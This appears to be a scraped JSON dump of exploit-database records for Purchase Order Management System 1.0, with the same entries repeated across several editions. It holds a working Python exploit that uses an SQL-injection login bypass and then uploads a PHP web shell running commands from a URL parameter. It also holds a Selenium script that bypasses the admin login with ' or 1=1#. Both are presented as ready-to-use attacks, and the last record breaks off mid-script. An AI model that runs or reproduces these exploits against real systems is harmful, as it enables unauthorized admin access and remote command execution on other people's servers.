"reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-16T22:38:33", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:04", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-14T22:50:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-17] #"}, "lastseen": "2021-10-16T22:38:33", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "48fb8c289b07c9c13de5a8f32701702b", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-18T12:48:53", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:04", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-14T22:50:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-18] #"}, "lastseen": "2021-10-18T12:48:53", "differentElements": ["sourceData"], "edition": 33}], "viewCount": 46, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:04", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-14T22:50:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-19] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.zdt.ZDTBulletin"]}, {"id": "1337DAY-ID-36729", "hash": "492d6c2c9c8ef7fc05adc7090d45942c", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-19T04:40:51", "history": [{"bulletin": {"id": "1337DAY-ID-36729", "hash": "0c5ddb7bbec4ce8deba93f61dd45742a", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-10T08:24:29", "history": [], "viewCount": 11, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-10T08:24:29", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-10T08:24:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-10] #"}, "lastseen": "2021-09-10T08:24:29", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "bccb35999be564d630bf7c4829f0e630", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-10T22:19:34", "history": [], "viewCount": 21, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-10T22:19:34", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-10T22:19:34", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-11] #"}, "lastseen": "2021-09-10T22:19:34", "differentElements": ["sourceData"], "edition": 2}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "32f8550cf64d1d79d844266db3c63eae", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-11T22:37:24", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-11T22:37:24", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-11T22:37:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-12] #"}, "lastseen": "2021-09-11T22:37:24", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "18b073f2e0230b89ce4a17f5e50d7996", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-12T22:22:31", "history": [], "viewCount": 29, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-11T22:37:24", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-11T22:37:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR 